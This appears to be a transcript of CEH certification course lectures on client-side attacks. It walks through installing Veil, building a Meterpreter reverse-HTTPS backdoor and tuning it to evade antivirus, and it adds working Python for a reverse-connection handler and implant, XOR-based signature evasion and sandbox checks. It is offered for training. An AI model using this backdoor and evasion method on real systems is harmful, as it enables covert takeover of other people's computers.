EC Council CEH 312-50 V11 Topic: Gaining Access – Client Side Attacks Part 1
December 19, 2022

1. Installing Veil Framework

In this section, we’re going to start talking about client-side attacks. Most of the time, it’s better to try to gain access to your target using server-side attacks: look for exploits in the operating system and in the applications installed on it. If you tried that and it didn’t work, or if the target is not directly reachable (the target person is not on the same network as us and sits behind a router or NAT, so if you ping their IP you won’t get a reply), then client-side attacks are your next option. These attacks require the user to do something.

So the user is going to have to open a link, install an update, or open a picture; they have to interact with something we send them. Once they do, we will be able to run code on their machine and achieve our goal. Because it requires user interaction, information gathering is very important here, and we don’t only need information about the installed applications: we also need to know the person, their friends, the networks they use, the websites they use, and whether there are websites they frequently use and trust. The information gathering in this section is therefore focused on the person rather than on the applications and the operating system.

I also want to show you my lab for this. We’re going to be using the Kali machine for attacking, and the victim or target is going to be the Windows machine. I’m just going to go over the network settings to show you that they’re both on the same network: they’re both on the 10.20.14.x NAT network. Both devices are on the same network, but it really doesn’t matter if they’re on different networks; these attacks will work anyway. We’re going to be using reverse connections for most of them, so the target doesn’t need to have a separate, publicly reachable IP address.

2. Veil Overview & Payloads Basics

In this lecture, we’re going to learn how to generate an undetectable backdoor. A backdoor is just a file that, when executed on the target computer, gives us full access to that computer, so it basically lets us hack it and do anything we want on it. There are a number of ways to generate backdoors, and what we’re interested in is generating one that is not detected by antivirus programs. This is not very hard to achieve, as you’ll see, and we’re going to do it using a tool called the Veil Framework. First of all, we have to install the framework. There is an installation script in the lecture’s resources that you can use to automatically install and configure it. I already have it downloaded in my Downloads directory; it’s called install-veil.

So I’m going to open my terminal and navigate to my Downloads using the cd command: cd Downloads. If we do ls, we can see the installation script. Feel free to open it and look at its contents: it’s just a series of commands that install the dependencies, download Veil, and configure it properly. To run this script, we first have to make it executable, and to do that we use the chmod command with +x to add executable permission. The file we need to add executable permission to is the one right here, install-veil. So we’re basically using chmod to change the file’s permissions.

We’re adding executable permission to this specific file. Press Enter, and the command runs without any output, which means it was executed successfully. If we do ls again to list the files, you’ll see the file listed in green, meaning it is executable. To run an executable in Linux, we always type ./ followed by the executable name. I’ll type the first letters and press Tab to autocomplete the name. So we’re simply running this file as an executable by prefixing it with ./, and I’m going to hit Enter to run it. I’m going to maximise this window, and you want to give it time. Make sure you have Internet access because, as I said, it’s going to download and install Veil and its dependencies. Veil is a massive framework; that’s why I didn’t include it in the custom image, because it’s really big. So give it time, and make sure you have a stable internet connection so it can download and install everything. If you face any issues, take a screenshot of the error and post it in the Q&A or in the forums, and we will be happy to help you.

Now, I’m going to pause this video, and we’ll resume once the installation is complete. During the installation, you may get a dialog asking whether services should be restarted automatically during the upgrade; to say yes and continue, navigate with the left arrow key to Yes and press Enter. You might also see messages on the terminal telling you to go through a wizard and click Next; ignore them. You don’t need to do anything; the script does everything for you, so you literally just need to wait for it to finish. Perfect, now the installation is complete. I’m just going to clear the screen, and if we type the tool name, veil, and hit Enter, you’ll see that the program runs with no issues at all. In the next lectures, I’m going to show you how to use this program to generate undetectable backdoors that can be used to hack Windows computers.

3. Generating An Undetectable Backdoor

Okay, now that we have Veil loaded, you can see it shows us the main commands you can use with it. You can do exit to exit, info to get information about a specific tool, list to list the available tools, update to update Veil, and use to use a tool. Updating is very important, because you always want to be up to date when it comes to bypassing antivirus programs. Now, let’s start using Veil Evasion, and as we use it, it will become easier to understand. Veil has two main tools, and if we do list, you’ll see them. The first one, which is the one we’re interested in, is called Evasion; that’s the one that generates undetectable backdoors for us. The second one is called Ordnance, and this tool generates the payloads (shellcode) used by Evasion, so you can look at it as a helper or secondary tool.

What I mean by a payload is the part of the backdoor’s code that does the stuff we want; the evil stuff, if you want to call it that. It’s the part of the code that gives us a reverse connection, the part that downloads and executes something on the target computer, the part that lets us achieve what we want when that file is executed. This will become clearer as we start using Veil. For now, we’re interested in using Evasion, so we’re going to do use 1, because it is the first and most important tool. As you can see, we have Veil Evasion loaded now. As I said before, this used to be a standalone tool that you downloaded on its own, but now it’s all combined in one framework. The first thing we get when we load Veil Evasion is the list of commands you can run in this tool. So the first thing we want to do is list all the available payloads, and as you can see, we have 41 different payloads. All of these payloads follow a certain naming pattern, and let’s take this one as an example, because that’s the payload I’m going to be using.

The payload name is divided into three parts. The first part refers to the programming language the payload is going to be wrapped in. So we have the evil code, and that code is wrapped in a certain programming language that the target computer can run. Right here you can see that this payload uses the Go programming language; this one uses C; these use C#; and we have Python, PowerShell and Ruby. If we scroll down, the second part of the name is really important: it’s the type of payload, the code that’s going to be executed on the target computer. In this example, we’re using Meterpreter, a payload from the Metasploit Framework. Metasploit is a huge hacking framework that lets you do a lot of things, but in this lecture we’re focusing on creating a Meterpreter payload. What’s really cool about Meterpreter is that it runs in memory and allows us to migrate between processes, so we can have the backdoor running from a normal process such as explorer.exe. This payload gives us full control over the target computer.

We’ll be able to navigate the file system, download and upload files, turn on the microphone and the webcam, even use that computer to hack other computers, and install a keylogger; you can do practically anything you can think of. All of this runs from memory, from a normal process on the system, so it’s hard to detect and it doesn’t leave many footprints. That’s why it’s a really cool payload, and we’ll be using it a lot. The third part of the name is the method used to establish the connection. Here you can see it’s called rev_https: rev stands for reverse, and HTTPS is the protocol that will be used to establish the connection, so this payload creates a reverse HTTPS connection. This one, for example, creates a reverse HTTP connection, and this one creates a reverse TCP connection. What I mean by “reverse” is that the connection is going to come from the target computer to my own computer.

So I won’t be connecting to the computer that I want to hack. Once the person double-clicks the backdoor, the backdoor connects back to me from the target computer. What’s cool about this is that it gets through firewalls and NAT: the target’s firewall doesn’t see an incoming connection, it sees an outbound connection from the target, which is exactly what happens when the person browses a normal website. I’m going to use a port that websites use, 80 or 8080, so if someone analyses the connection, it will look as if the target is just connecting to a normal website. Also, if the target computer is hidden behind a router or behind a network, this still works, because the connection is coming from the target computer to me instead of me connecting to the target computer. So a reverse connection is really handy, and in most cases it’s really the only practical way of gaining access to a computer, because there are a lot of things that can prevent you from connecting to a certain computer. Now, this is the general naming pattern.
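The reverse connection described above, as an added example rather than code from the course, Veil or Metasploit: both halves run in one process on loopback, an OS-assigned port stands in for the LPORT 8080 used in the text, and a constructed one-line probe stands in for Meterpreter’s own protocol. The handler never dials the target; it only listens, and the `peer` tuple it records shows that the TCP connection originated on the target side.

```python
"""Reverse connection, end to end, on loopback: the 'target' side dials out to the handler.

Added example, not Veil's or Metasploit's code. Port 0 lets the OS pick a free port, standing
in for the LPORT (8080) used in the text; both sides run in one process so it works offline.
"""
import os
import socket
import threading

PROBE = b"HELLO?\n"   # handler -> implant; a constructed stand-in for the real protocol


def own_identity() -> str:
    """What the implant reports back; also lets a caller check the round trip."""
    return f"{socket.gethostname()} pid={os.getpid()}"


def handler(ready: threading.Event, result: dict, host: str = "127.0.0.1") -> None:
    """Attacker side (LHOST): listen, wait for the call-back, send a probe, record the reply."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))                       # port 0: OS-assigned, stands in for 8080
    srv.listen(1)
    result["port"] = srv.getsockname()[1]
    ready.set()                               # the implant may now connect
    conn, peer = srv.accept()                 # blocks until the target dials in
    with conn:
        conn.sendall(PROBE)
        reply = conn.makefile("rb").readline()
    srv.close()
    result["peer"] = peer                     # (target_ip, target_ephemeral_port)
    result["reply"] = reply.decode().rstrip()


def implant(lhost: str, lport: int) -> None:
    """Target side: the backdoor connects *out* to LHOST:LPORT and answers the probe."""
    with socket.create_connection((lhost, lport), timeout=5) as s:
        if s.makefile("rb").readline() == PROBE:
            s.sendall((own_identity() + "\n").encode())


def reverse_demo() -> dict:
    """Run handler and implant together; returns what the handler observed."""
    ready, result = threading.Event(), {}
    t = threading.Thread(target=handler, args=(ready, result), daemon=True)
    t.start()
    ready.wait(5)
    implant("127.0.0.1", result["port"])
    t.join(5)
    return result


if __name__ == "__main__":
    r = reverse_demo()
    print(f"call-back from {r['peer'][0]}:{r['peer'][1]} -> handler port {r['port']}: {r['reply']}")
```

A bind payload would invert the roles (the target listens and the attacker connects in), which is exactly the direction a home router’s NAT or a host firewall blocks by default; the outbound direction shown here is why reverse payloads are the practical choice.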

You’ll see some payloads, like this one, that don’t follow that general pattern. For example, this one is called shellcode_inject. What it does is create a payload that injects another payload: it creates a normal payload, and that normal payload injects Meterpreter shellcode. It does this to try to bypass more security, but in my experience these tend to get detected more often than the normal payloads, so I usually just use one of the normal payloads. So this is it for the payloads. Sorry, I took a bit of time, but I wanted to make sure that you understood the naming pattern, what a payload is, and what a reverse connection is and how the HTTP, HTTPS and TCP transports differ. This way, the rest of the course will be clearer, and I can just use the payload that I want without explaining what it is. In the next lecture, we’re going to be generating a payload and testing it against antivirus programs.

4. Listening For Incoming Connections

Okay, in this video we’re going to use Veil to create a backdoor. The first thing I’m going to do is list the available tools, and I’m going to use number 1, because we want Evasion. Then I’m going to list the payloads. As I mentioned in the previous lecture, I want to use go/meterpreter/rev_https, which is number 15 in the list, so I’m going to do use 15. That will first show me information about this specific payload, and then the options I can set for it. The main option you want to set, and the most important one, is the IP address at which you’re going to receive the connections. As we said, we’re going to have a reverse connection, so we need to set the IP address that the payload, the backdoor, will try to connect to.

In our case, we want to receive the connection on this Kali machine, so we’re going to set the IP address to the IP of the current Kali machine. To get the IP of my Kali machine, I have to run ifconfig. I’m going to split the screen by right-clicking and choosing “split horizontally”, bring this pane down a bit, and run ifconfig. You can see the IP address, which is 10.20.14.213 in this case. This is the IP of my Kali machine, the attacking machine, and this is where I want the connection to come back to, so I can control the target computer once the backdoor is executed. You can set any of these options using the set command: type set followed by the option to change and the new value. In this case, we want to change LHOST, so we’ll do set LHOST 10.20.14.213.

LPORT is set to 80 by default, which is really good because that’s the port used by web servers; as I said, the connection will look as if the target is connecting to a website, which is not suspicious. But I don’t want to use that port because I’ll have a web server running on it, and we’ll talk about that later. So I’m going to change it to 8080. 8080 is another port commonly used by web servers, so it’s still not suspicious and it should still get through firewalls. I’m going to use set the same way we did for LHOST: set LPORT 8080. If I do options again to list all the options, you’ll see that LHOST changed to 10.20.14.213 and LPORT changed to 8080. Now, if you generate the backdoor like this, you will bypass all antivirus programs except AVG. I’ve already tried this.

That’s how I know this. And that’s not good enough, because we want to bypass everything. The way antivirus programs work is that they have a very large database of signatures. These signatures correspond to files that contain harmful code. They compare the signature of your file, your backdoor, against this massive database: if your file matches any of these signatures, they flag it as a virus or malware, and if it doesn’t, they treat it as a normal file. (Modern products also apply heuristics and behavioural monitoring on top of signatures, which is why a file that scans clean can still be flagged once it runs.) So the main point is that we’re going to modify the file, our backdoor, as much as possible to make it more unique, so that it doesn’t match anything in the signature database and bypasses antivirus programs. Veil is already doing that for us: it’s encrypting the backdoor, obfuscating it, and injecting it into memory so that it doesn’t get detected, and it’s doing a good job at it. It’s bypassing pretty much everything except for one antivirus program. So just to bypass this last one, I’m going to set some optional options that really won’t make much of a difference; they’ll just make the backdoor look a bit different.
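The signature-matching logic described above, as an added example (not Veil’s code and not how any particular vendor’s engine is written): `KNOWN_BAD` is a constructed stand-in for a file a vendor has already catalogued, the two databases are built from it, and `xor_wrap` with the assumed key `k3y` is a toy stand-in for the encryption Veil applies. It shows why a byte-for-byte tweak defeats only hash signatures, why an encoded stub defeats pattern signatures too, and why the decoded copy in memory is exactly what a memory scanner would still catch.

```python
"""Static signature matching, and why an encoded stub that only decodes in memory slips past it.

Added example, not Veil's code. KNOWN_BAD is a constructed stand-in for a catalogued malicious
file; the hash and pattern databases are built from it the way a vendor would build them.
"""
import hashlib
import re

KNOWN_BAD = b"MZ\x90\x00" + b"REVERSE_HTTPS_STUB:10.20.14.213:8080" + b"\x00" * 16  # constructed

# Signature style 1: exact file hash (what a hash-only lookup such as checkvt relies on).
HASH_DB = {hashlib.sha256(KNOWN_BAD).hexdigest()}
# Signature style 2: a distinctive byte pattern inside the file (YARA-style).
PATTERN_DB = [re.compile(rb"REVERSE_HTTPS_STUB:\d{1,3}(?:\.\d{1,3}){3}:\d+")]

KEY = b"k3y"  # assumed key; any non-zero bytes will do for the demonstration


def hash_scan(data: bytes) -> bool:
    return hashlib.sha256(data).hexdigest() in HASH_DB


def pattern_scan(data: bytes) -> bool:
    return any(p.search(data) for p in PATTERN_DB)


def scan(data: bytes) -> dict:
    return {"hash": hash_scan(data), "pattern": pattern_scan(data)}


def xor_wrap(data: bytes, key: bytes) -> bytes:
    """Toy stand-in for the encryption Veil applies; XOR twice with the same key restores it."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_variants() -> dict:
    header, stub = KNOWN_BAD[:4], KNOWN_BAD[4:]
    return {
        "original": KNOWN_BAD,                      # the catalogued file itself
        "tweaked": KNOWN_BAD + b"\x00",             # one extra byte, e.g. a changed option
        "wrapped": header + xor_wrap(stub, KEY),    # stub stored encoded, decoded at run time
    }


def demo() -> dict:
    """Scan each variant, plus what the wrapped variant looks like once decoded in memory."""
    v = build_variants()
    results = {name: scan(data) for name, data in v.items()}
    decoded = v["wrapped"][:4] + xor_wrap(v["wrapped"][4:], KEY)   # what a memory scanner sees
    results["wrapped_decoded_in_memory"] = scan(decoded)
    return results


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:28s} hash={verdict['hash']!s:5s} pattern={verdict['pattern']}")
```

The run shows the progression the text relies on: the original hits both signatures, the tweaked copy only the pattern, and the wrapped copy neither; the last row is the caveat, since the decoded stub is identical to the catalogued one the moment it is unpacked.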

The first thing I’m going to change is PROCESSORS, the minimum number of processors the backdoor requires before it runs (a check aimed at antivirus sandboxes, which often report a single CPU). I’m not going to set a huge number, because that would just stop my backdoor from running on the target; I’m going to set it to 1, which is pretty much nothing. I’m only setting it to make the code look a bit different, the same way we set LPORT and LHOST: set PROCESSORS 1. I’m also going to set SLEEP, which makes the backdoor sleep for the number of seconds you specify before it executes the payload (and checks whether the sleep was fast-forwarded, another sandbox tell). I’m going to set this to 6: set SLEEP 6. Again, there is no strong reason for this particular value; I’m only doing it to make the backdoor look a bit different. I hit Enter and do options again to make sure everything is set the way I want: LHOST, LPORT, PROCESSORS and SLEEP. Then I run generate to generate the backdoor. It asks me to name the backdoor, so I’m going to call it rev_https_8080, just so that we remember which payload and which port to use with this backdoor in the future. Now the backdoor is generated, and Veil tells us the module that was used and where the backdoor is stored; the backdoor is kept at this path.
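What the PROCESSORS and SLEEP options actually check, as an added example in plain Python rather than the template Veil compiles into the backdoor: the thresholds are parameters, the text uses 1 and 6, and `environment_looks_real` is a hypothetical gate that only lets the payload proceed when both checks pass.

```python
"""The two checks behind Veil's PROCESSORS and SLEEP options, as plain Python.

Added example, not Veil's code: a stand-in that shows what those options do rather than the
template Veil compiles. Thresholds are parameters; the text uses PROCESSORS=1 and SLEEP=6.
"""
import os
import time


def enough_processors(minimum: int) -> bool:
    """Sandboxes commonly expose a single CPU; a real workstation usually has several."""
    return (os.cpu_count() or 1) >= minimum


def sleep_was_accelerated(seconds: float, tolerance: float = 0.5) -> bool:
    """Sleep, then compare against the wall clock.

    Emulators that fast-forward Sleep() to finish scanning quickly return long before
    `seconds` has really elapsed; on a real host, elapsed >= seconds.
    """
    start = time.monotonic()
    time.sleep(seconds)
    elapsed = time.monotonic() - start
    return elapsed < seconds * tolerance


def environment_looks_real(min_processors: int = 1, sleep_seconds: float = 6.0) -> bool:
    """Hypothetical gate: proceed with the payload only when both checks pass."""
    if not enough_processors(min_processors):
        return False
    if sleep_was_accelerated(sleep_seconds):
        return False
    return True


if __name__ == "__main__":
    print("cpus:", os.cpu_count(), "-> run payload:", environment_looks_real(1, 0.5))
```

Setting PROCESSORS too high is the failure mode the text warns about: a single-core target VM would fail the check and the backdoor would silently never call back, which is why 1 is the safe choice in a lab.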

So I’m going to copy that. Let’s check whether the backdoor is detected by any antivirus programs. You can use Veil’s built-in checkvt command, but that feature only checks the file’s hash, and it’s not 100% accurate: sometimes it tells you the file bypasses all antiviruses when it will actually be detected. You can also upload it to VirusTotal, but I don’t recommend that, and please don’t do it: if you do, your backdoor will become less effective, because VirusTotal shares its samples and scan results with antivirus vendors. We’re going to use a website called NoDistribute for this, so I’m going to Google “NoDistribute” and open it. It’s similar to VirusTotal; the only difference is that it doesn’t share the results with antivirus vendors, so it won’t affect your backdoor. I’m going to click Browse to navigate to my file, and I’m just going to copy where the file is stored. Veil is telling me that it’s stored under /usr/share/veil-output/compiled/.

I’m going to copy this path, come here, click on the pen icon, paste the location, click Open, and scan the file. I’ll include a link to this website in the resources of this lecture, along with an alternative in case it doesn’t work for you. As you can see, the file bypasses all the antivirus programs in the scan. So we can use this backdoor against our target and, going by this scan, the target computer will not detect the file as a virus. Please keep in mind that you won’t always get perfect results like this. Antivirus programs constantly update their databases, and Veil constantly updates the way it generates backdoors, so it’s a full cycle: Veil is always trying to bypass antiviruses, and antiviruses are always trying to detect the latest backdoors. So first of all, make sure you’re using the latest version of Veil, and then experiment with the different payloads and options until you get it to work.

This is the most basic method of generating undetectable backdoors. I cover more advanced methods in my social engineering course and in my Python course, where I show you how to write your own backdoor, which is the best method. But those methods are more complex, and this course is designed to be a general one that introduces you to most hacking fields without diving deep into any of them. So if you want to learn more advanced methods of bypassing antivirus programs, check out those courses in the bonus lecture, the last lecture of the course. For now, you don’t need to worry about this. If you can’t get the backdoor to bypass the antivirus software, you can simply disable Windows Defender or the antivirus on the target Windows machine for testing, just to get an idea of how to generate backdoors and interact with them. If you then want to learn more, those other courses build on what you’re going to learn here, so you’ll need the skills from this course first. Also check out the YouTube video in the resources of this lecture to get a taste of what those methods look like and how effective they are.
